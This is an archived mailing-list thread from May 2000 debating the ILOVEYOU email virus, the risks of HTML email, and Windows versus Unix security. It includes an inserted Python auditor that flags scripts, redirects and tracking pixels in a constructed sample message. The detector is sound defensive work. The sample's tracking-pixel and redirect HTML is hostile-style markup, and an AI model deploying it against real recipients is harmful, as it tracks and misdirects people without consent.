Lillian Komlossy wrote: We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... So turn off JavaScript for mail messages. -- /==\ |John Stracke| http://www.ecal.com |My opinions are my own.| |Chief Scientist |=| |eCal Corp. |But this one goes to 11x.| |[EMAIL PROTECTED]| | \==/
RE: VIRUS WARNING
Lillian, I am not so sure I totally agree. Why exactly do we need HTML based e-mail...Is it really necessary? E-mail is a service for transmitting a written message, and written messages certainly don't require background graphics or a full blown graphically based webpage. There are a few reasons why I believe this, one of the most compelling IMHO is that graphic content in e-mails increases the size of the e-mail exponentially, thus greatly contributing to the packet congestion already extremely evident on the Internet today. I realize that we are developing new technologies all the time that increase bandwidth, but I think it's terribly inefficient, and dangerous. There is no practical need for html e-mail. It's like saying I want to use a tractor trailer to commute to work everyday, but it needs to consume only as much gas as an eco car, and go as fast as a Ferrari. Scot -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 11:13 AM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. 
Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
Scot, ITA we do not need the HTML email for our everyday use. HTML based email is mainly used by the Email-Newsletter companies, (i.e. Whitehat, Exactis, etc...) especially for advertising purposes. We can argue that we don't need it but in reality, these companies live off the daily newsletters they send out. I believe all of these newsletters are being sent out to people who actually subscribed to receive them. While the reason is mainly commercial it cannot be ignored. As far as the bandwidth is concerned - most of those HTML emails don't actually email the images but rather display it via a link from their own server. (Which of course does not help bandwidth matters especially if first the run it through a logging agent). I believe the problem starts when somebody writes an HTML email that can retrieve, write or execute anything on the receiving client's system. I agree with you - it is contradictory. So is every new technology, even the more tangible ones. I'll bet once everybody agreed that there is no need for the automobile, horses will do fine - but now we want to take our tractor-trailer to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go figure. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 1:59 PM To: 'Lillian Komlossy' Cc: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Lillian, I am not so sure I totally agree. Why exactly do we need HTML based e-mail...Is it really necessary? E-mail is a service for transmitting a written message, and written messages certainly don't require background graphics or a full blown graphically based webpage. 
There are a few reasons why I believe this, one of the most compelling IMHO is that graphic content in e-mails increases the size of the e-mail exponentially, thus greatly contributing to the packet congestion already extremely evident on the Internet today. I realize that we are developing new technologies all the time that increase bandwidth, but I think its terribly inefficient, and dangerous. There is no practical need for html e-mail. It like saying I want to use a tractor trailer to commute to work everyday, but it needs to consume only as much gas as an eco car, and go as fast a Ferrari. Scot -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 11:13 AM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
At 10.11 -0600 0-05-11, Vernon Schryver wrote: Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? What is wrong with that. I use HTML-based e-mail mostly to include pictures in my messages. A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers do not handle such messages very well yet. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/
RE: VIRUS WARNING
Lillian, Those newsletters that you have spoken of can quite easily be distributed in text format with the standard html tags that are used in text based messages already. Notice my sig has the standard mailto and http tags which can be recognized by the e-mail browser ("Note this is a text message too"), that directs the user to the necessary info if they are inclined without ramming the website down their throat. You are correct in stating that html e-mail does not necessarily and ordinarily does not contain the actual graphical content, but it does "call" the content in question the moment it is opened. This is transmitting an entire webpage through e-mail because in fact a webpage is just the html code which "calls" all the hrefs that exist elsewhere, whether on the local host or not. I certainly agree that html e-mail is also dangerous due to the ability to link the content local to the e-mail readers host. It creates the ability for the sender of an e-mail to gather information that may not be considered sensitive or otherwise plainly undesirable. It also opens the ability to introduce agents and other infectious material to a host that would otherwise require a user's physical acceptance of such material. The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. The issue here is not about whether it is technologically sound, but whether we are able to market the masses with or without their expressed consent. 
If a user wishes to visit a commerce's or industry's website they will certainly follow the link provided in the e-mail. It is a different story to simply place the web content directly in front of the user, and this begin to cross the line of harassment and invasion. Its like the difference between receiving an invitation to an open house, and finding out that the open house is coming to YOUR house. Technology doesn't have to contradictory...it is our (ietf) purpose to ensure the internet is used efficiently and in the mass's best interests. This doesn't mean regulation, but it does mean providing proper avenues to get where ever a person wants to go. I will state again, that it isn't our business to prevent access, but it is our business to make sure that people can and do access in the appropriate manner in such a way as to ensure each and every user is satisfied. I mean it would be really silly if you FINGERed a site and got a webpage to display the information. Analogously -html e-mail is a lot like the Microsoft windows is it good for consumers or bad. HTML e-mail like Microsoft windows has made content browsing easier and closer to ubiquitousness, but at the cost of user education. If there is no reason for a user to learn how to use the web or the rest of the net, then why should they??? -Scot Mc Pherson -RF Engineer -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 2:29 PM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, ITA we do not need the HTML email for our everyday use. HTML based email is mainly used by the Email-Newsletter companies, (i.e. Whitehat, Exactis, etc...) especially for advertising purposes. We can argue that we don't need it but in reality, these companies live off the daily newsletters they send out. 
I believe all of these newsletters are being sent out to people who actually subscribed to receive them. While the reason is mainly commercial it cannot be ignored. As far as the bandwidth is concerned - most of those HTML emails don't actually email the images but rather display it via a link from their own server. (Which of course does not help bandwidth matters especially if first the run it through a logging agent). I believe the problem starts when somebody writes an HTML email that can retrieve, write or execute anything on the receiving client's system. I agree with you - it is contradictory. So is every new technology, even the more tangible ones. I'll bet once everybody agreed that there is no need for the automobile, horses will do fine - but now we want to take our tractor-trailer to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go figure. Lillian Komlossy Site Manager http://www.dmnews.com http://www.ima
Re: VIRUS WARNING
On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. Strictly speaking, part 1: E-mail as a whole is not a necessity. The US Postal Service has a 200 year record of delivering large amounts of material in a reasonably cost-effective manner. Strictly speaking, part 2: A case could be made that there should *NOT* be hypertext links in a text/plain segment of an E-mail. RFC2046, section 4.1.3 says pretty specifically: 4.1.3. Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks, use text/html or some other type that is defined to support them (Yes, I *know* people violate this all the time. Doesn't mean we should encourage it *more* just because we don't like text/html) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote: At 10.11 -0600 0-05-11, Vernon Schryver wrote: Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? What is wrong with that. I use HTML-based e-mail mostly to include pictures in my messages. Yup... It's real amusing to have your boss looking over your shoulder just about the time a spammer hits your mailer with an html message including IMG SRC= tags embedding some of his porno for you to sample (don't scoff, it has been occurring and has required some people to do some fast talking). Another insidious trick is to use the refresh tag to bounce you over to his site where he may have other pleasures for you like pop-up windows when you try to close the window. This doesn't work as good since I don't think it's as well supported. But it has been tried and does catch some chumps. Note that the refresh tag is not active content and if you are reading E-Mail in a browser, it can be real effective and real embarrassing. I don't know how effective it is in mere html enabled readers like Outlook or Eudora. As far as tracking down the perpetrators goes... How effective have you been at tracking down the people responsible for spam? A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers do not handle such messages very well yet. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/ Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
RE: VIRUS WARNING
strictly speaking the US postal service is not a form of electric or electronic data communication strictly speaking...my sig IS plain text...it is the browser that recognizes that it could be used as a link Strictly speaking RFC2046, section 4.1.3 says pretty specifically: 4.1.3. Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, but it says nothing of e-mail browsers recognizing a string of "plain-text" as an address. -Scot Mc Pherson -RF Engineer -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 3:32 PM To: Scot Mc Pherson Cc: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Thu, 11 May 2000 15:04:48 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The necessity to send e-mail in html is NOT. Regardless of whether a list or commerce wishes to advertise through e-mail, there are already avenues for distributing material to demographically selected individuals. Its called the WWW and creating hypertext links in an e-mail to direct a user to desired content is certainly MORE than enough, and also solves part of the congestion problem, because the user must take the time to visit the site in question as opposed the site making a visit to each and every recipient of the message, whether they care about this week's issue of the newsletter or not. Strictly speaking, part 1: E-mail as a while is not a necessity. The US Postal Service has a 200 year record of delivering large amounts of material in a reasonably cost-effective manner. Strictly speaking, part 2: A case could be made that there should *NOT* be hypertext links in a text/plain segment of an E-mail. RFC2046, section 4.1.3 says pretty specifically: 4.1.3. 
Plain Subtype The simplest and most important subtype of "text" is "plain". This indicates plain text that does not contain any formatting commands or directives. Plain text is intended to be displayed "as-is", that is, OK? Got that? In other words, it's *PLAIN* text. You want hyperlinks, use text/html or some other type that is defined to support them (Yes, I *know* people violate this all the time. Doesn't mean we should encourage it *more* just because we don't like text/html) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
From Steven M. Bellovin's message Thu, 11 May 2000 07:40:26 -0400: } }In message [EMAIL PROTECTED], Einar Stefferud writes: } [snip]... } }Seems to me that this beloved "feature" (giving root privs to random }EMail messages) should (by now) now be fully discredited, and should }be destined for extinction, if only the customers will accept its }disappearance in trade for an absence of a continuing flood of these }$6,000,000,000 economic loss episodes. } }See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how }it worked -- but it didn't involve any analog to 'root' privileges. } I believe the distinction between USER Privs and ROOT Privs in Windows is almost negligible, in that the typical user opening an attachment in USER space allows major modifications of basic ROOT functions and data tables, hence in Windows (and probably other PC environments without multi-user system barriers) there is very little ROOT protection from USER run processes. And, therein lays the "root" of the problem;-)... This is of course aggravated by attachment of such PCs to the Internet where all end users are responsible for protecting themselves, while their software does not help them to protect themselves. It takes a considerable wizard to do all the complex things that need to be done to close the security holes. But, why large Fortune 2000 companies put up with all this is a great mystery to me, and of course, until they get the message here, they will continue to fatten the MS purse while buying such trouble as these problems will cause. To repeat my mantra, it's the customer's fault, cause vendors insist on selling what people will buy;-)... How can any vendor do otherwise?? Cheers...\Stef } }When the recipient got a copy, there was an included (or attached; I }don't quite remember) REXX file. (REXX was a scripting language for VM/ }CMS.) 
The message told you that it would display a Christmas card if }you ran it; most users did just that, since the note appeared to come }from someone they knew. And then the file replicated itself; you all }know the rest. } }Note the two crucial points -- it ran with the user's permissions, and }it was explicitly run by the user, rather than by any automatic }mechanism. } } --Steve Bellovin Cheers...\Stef
Re: VIRUS WARNING
From: John Stracke [EMAIL PROTECTED] --95872F20B70C837D61220742 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Vernon Schryver wrote: What good is HTML based email if it cannot run scripts or even contain links to other HTML content? Well, there's basic formatting: * Simple font variations (italics, bold, color, font) are an easy way to add a bit of expressiveness to your text. o Everybody says that the problem with email is that it's not expressive enough. o To compensate, we've got an elaborate set of conventions for imitating what you can do in print and face-to-face (smileys, *asterisks* for emphasis, etc.). o But new users don't know these conventions. o HTML offers the ability to do the same thing more comprehensibly. Actual smiley faces, italics for emphasis (just like people are used to seeing in print), headings. * And, of course, lists and tables are amazingly useful. All of that can be done in pure ASCII. You don't have to be Shakespeare to communicate with the written word without more punctuation than existed in 1960. There was no global plague in 1970 that damaged all English speaking brains so that they could no longer communicate without 256 colors of foreground and background, and 1000 typefaces. "Smileys" are particularly lame. No joke is made funny with a smiley nor is any insult prevented. The conventions of bullet lists such as rendered by LI are also mere conventions as opaque to the uninitiated as asterisks or capitalization for emphasis. Most of us are bright enough to not need any explicit initiation to any reasonable convention; even smileys were obvious when there was only 1 kind. And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some vacation time, I filled out a form on the HR site; they would send mail to my manager, with one link to approve and one to deny. 
Much easier than paper-based systems, or even non-email-based online systems (since the vacation request comes into the inbox you already check, instead of making you go someplace else). Email is not a general purpose hammer. All of those things work far better with various other mechanisms than crammed into email. Email can be a useful part of such systems, but competently designed systems DO NOT do such things purely in email. Worse, when crammed into email, those mechanisms are *INEVITABLE* serious security problems. Email is not only for communications among intimates, such as you and your Human Resources Department. If you let your MUA fully decode HTML every time you read a message, then you are in deep trouble. It's not just the Java and Javascript. Do you really want to tell strangers every time you look at their email because it contains an HREF to a unique URL created just for the purpose? ... --95872F20B70C837D61220742 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit !doctype html public "-//w3c//dtd html 4.0 transitional//en" html Vernon Schryver wrote: blockquote TYPE=CITEWhat good is HTML based email if it cannot run brscripts or even contain links to other HTML content?/blockquote Well, there's basic formatting: ul li Simple font variations (italics, bold, color, font) are an easy way to add a bit of expressiveness to your text./li ul li ... If the point in including an HTML encrypted version of the text in addition to the plantext was to demonstrate the utility of HTML in email, it fell flat. The HTML version conveyed *nothing* to me that the plaintext did not. And yes, I checked by viewing the HTML with Netscape 4.7. ... pre--nbsp; /===\ |John Strackenbsp;nbsp;nbsp; | A HREF="http://www.ecal.com"http://www.ecal.com/A |My opinions are my own. 
| |Chief Scientist |==| |eCal Corp.nbsp;nbsp;nbsp;nbsp;nbsp; |Whose cruel idea was it for the word "lisp" to| |[EMAIL PROTECTED]|have an "S" in it?nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; | \===//pre nbsp;/html That's what your signature looks like encrypted with HTML. (I'm hoping my archaic quote leading will keep too-smart-by-half MUA's from collapsing it into reasonableness) Who could prefer it to the plaintext version? /===\ |John Stracke| http://www.ecal.com |My opinions are my own. | |Chief Scientist |==| |eCal Corp. |Whose cruel idea was it for the word "lisp" to| |[EMAIL PROTECTED]|have an "S" in it?
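Added example (not from any poster in the thread): a Python audit of a mail message that separates what an HTML part would do merely by being opened (scripts, event handlers, the refresh tag, IMG SRC fetches) from what needs a click (per-recipient links, forms), and falls back to the text/plain alternative for display. The sample message, hosts, tokens and category names are constructed for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message; every host and token below is made up.
SAMPLE = """\
From: newsletter@example.invalid
To: reader@example.invalid
Subject: Weekly issue
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=us-ascii

Weekly issue: see http://news.example.invalid/issue/42
--b1
Content-Type: text/html; charset=us-ascii

<html><head>
<meta http-equiv="refresh" content="0; url=http://ads.example.invalid/land">
<script>document.title = "hi"</script>
</head><body onload="init()">
<p>Weekly issue</p>
<img src="http://track.example.invalid/open.gif?rcpt=a1b2c3" width="1" height="1">
<a href="http://news.example.invalid/issue/42?u=a1b2c3">Read more</a>
<form action="http://news.example.invalid/poll"><input name="q"></form>
</body></html>
--b1--
"""

ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}
# Attributes a renderer fetches without any user action.
REMOTE_LOAD = {"img": ("src",), "body": ("background",), "link": ("href",),
               "iframe": ("src",), "input": ("src",)}
# Categories that only matter once the reader clicks or submits.
NEEDS_CLICK = {"tagged-link", "form"}


def is_remote(url: str) -> bool:
    return url.startswith("//") or urlsplit(url).scheme in ("http", "https", "ftp")


class MailHtmlAuditor(HTMLParser):
    """Collects (category, tag, detail) for constructs a mail reader should block."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-content", tag, a.get("src", "")))
        for name in a:
            if name.startswith("on"):  # onload, onclick, ...
                self.findings.append(("event-handler", tag, name))
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("redirect", tag, a.get("content", "")))
        for attr in REMOTE_LOAD.get(tag, ()):
            if is_remote(a.get(attr, "")):
                self.findings.append(("remote-load", tag, a[attr]))
        href = a.get("href", "")
        if tag == "a" and is_remote(href) and urlsplit(href).query:
            self.findings.append(("tagged-link", tag, href))
        if tag == "form":
            self.findings.append(("form", tag, a.get("action", "")))


def audit_message(raw: str) -> dict:
    """Return the plain-text body to display plus findings from any HTML part."""
    msg = message_from_string(raw)
    plain, findings = None, []
    for part in msg.walk():
        ctype = part.get_content_type()
        if part.is_multipart() or ctype not in ("text/plain", "text/html"):
            continue
        charset = part.get_content_charset() or "us-ascii"
        body = part.get_payload(decode=True).decode(charset, errors="replace")
        if ctype == "text/plain" and plain is None:
            plain = body.strip()
        elif ctype == "text/html":
            auditor = MailHtmlAuditor()
            auditor.feed(body)
            auditor.close()
            findings.extend(auditor.findings)
    return {
        "display": plain,
        "on_open": [f for f in findings if f[0] not in NEEDS_CLICK],
        "needs_click": [f for f in findings if f[0] in NEEDS_CLICK],
    }


if __name__ == "__main__":
    report = audit_message(SAMPLE)
    print("display as text:", report["display"])
    for kind in ("on_open", "needs_click"):
        for category, tag, detail in report[kind]:
            print(f"{kind:12} {category:15} <{tag}> {detail}")
```

The `on_open` list is the part that removes the "explicitly run by the user" step debated earlier in the thread: each entry takes effect when the message is rendered, before the reader has chosen anything.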
Re: VIRUS WARNING
The pattern is longer than you remember;-)... From Brant's message Sat, 06 May 2000 00:38:29 +: } }I think I'm starting to see a pattern emerging in email viruses. } }Melissa: Uses script to read user's address book to get the email }addresses of new victims. }ILOVEYOU: Uses script to read user's address book to get the email }addresses of new victims. } }What method do you think the next email virus is going to use if }Microsoft doesn't stop scripts from reading people's address books? Why }didn't MS plug this hole after Melissa? } }Brant The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Christmas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. ((Aside: Do you suppose that MS wants to be like IBM so much that they are making all the same mistakes in the same serial order?)) Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) now be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. This is a perfect proof of a conjecture made by Hasan Azbekan back in the mid 1960's that "The Triumph of Technology is: Can Implies Shall". There is no way to stop this kind of thing repeating and repeating until the easily subverted facility disappears from the Internet. And as long as the customers demand it, it will continue;-)... It is easy to blame the vendors, but they are trapped into selling what the customers demand. So, the fault lies with the customers' choices;-)... And, they, led by the Fortune 2000, have rewarded MS handsomely for creating the fertile ground for propagation. For myself, I am contributing to the solution by never ever running any kind of MS mail tool, ever again. You see, I do not blame MS for this. 
I blame all the users of MS Mail tools for buying into the game, and I am doing all that I can to make sure that I do not pay the price for their disregard for their own safety and security. I am pleased to say that I have not knowingly received a single copy of the "LOVE BUG", even via mailing lists, though I do have to admit to a certain sense of being unloved because of this great lack;-)... Cheers...\Stef
Re: VIRUS WARNING
On Sun, 7 May 2000, Keith Moore wrote: I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." sooner or later that phrase will be recognized as less valuable than bovine feces. (In the U.S.) It has value, but only in disclaiming rights which are not ordinarily legally present. I cannot escape liability for causing an auto accident by putting such a label on my car, but such a label can provide evidence that a customer could not have reasonably believed that a company was not assuming liability which would not ordinarily have been legally assigned to it - for instance, if MS was not negligent in any fashion, but Windows still manages to make my computer disintegrate, I would have difficulty establishing that MS should pay for my computer because of implied promises in their advertising. Even in the stronger case where the license agreement states "by agreeing to the terms of this license, the user agrees not to hold MS liable for any damage caused by this product," this is generally worthless if MS is negligent - you cannot waive rights to recourse for "any and all damage which might potentially occur." -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
RE: VIRUS WARNING
Sorry Lillian, Forgot to add the smiley !!! Did not intend to upset anybody I actually use both systems, but prefer Unix ;- Jim -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 2:28 PM To: Jim Dunn Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Let's not make it political. We've all been attacked, it is pointless to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac are all great as long as somebody likes to work with them. I personally like Microsoft products, but I respect those who don't - and expect the same respect from them. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 4:18 PM To: 'A James Lewis'; 'Lillian Komlossy' Cc: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software) Jim Jim Dunn Senior Network Engineer San Francisco NOC -Original Message- From: A James Lewis [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:53 AM To: Lillian Komlossy Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING The whole world will use what they are presented with the difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability that's holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too! On Thu, 4 May 2000, Lillian Komlossy wrote: Donald, The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. 
So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
RE: VIRUS WARNING
It should be pretty obvious that the only reason that viruses are so prolific on MS platforms, is that so many people are using them. When designing a virus to spread, the user base must be considered. A virus written to infect UNIX systems would not attract much attention anywhere other than a small circle of professionals and engineers. Michael B. Bellopede [EMAIL PROTECTED] -Original Message- From: Randall Stewart [mailto:[EMAIL PROTECTED]] Sent: Friday, May 05, 2000 8:05 PM To: Michael H. Warfield Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING Michael: I could not agree more, we have a few (possibly .. 3) viruses that have infected *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionally fire up the other side to read an awful .doc or .ppt file... I simply refuse to allow our IT dept to have their way with me and infect me with the worst virus... that other O/S :-) R "Michael H. Warfield" wrote: On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Hmm.. the Morris worm of 1988. What are the other 2? Bliss? Wasn't very sophisticated and it didn't propagate very well, but it did work. It just fizzled out because its propagation coefficient never even came close to break even. What's the other one? Hmm.. 
if you count the 2 self-reproducing sample programs that came with 'gcc', no others. Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations... I've seen some assembly code someone was proposing on one of the development lists. One of the DOS virus writers claiming that it would work as a Linux virus. No evidence that it does anything though. I would marginally call that one a "proof of concept" or a "maybe of concept". Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it! -- Randall R. Stewart Member Technical Staff Network Architecture and Technology (NAT) 847-632-7438 fax:847-632-6733
RE: VIRUS WARNING
From: "Michael B. Bellopede" [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Date: Mon, 8 May 2000 09:27:14 -0400 It should be pretty obvious that the only reason that viruses are so prolific on MS platforms, is that so many people are using them. Hardly. Compare the apparent security considerations in the design of Microsoft Outlook and Word (execute pretty much anything with few limitations on the effects the executing code can have on the hosting system) with those of Java and the Java virtual machine (provide a sandbox in which the code executes and provide mechanisms (e.g., the SecurityManager) that control the effects the code executing in the sandbox can have on the broader environment). It should be pretty obvious that security is a greater design consideration for some systems than for others. -tjs
Re: VIRUS WARNING
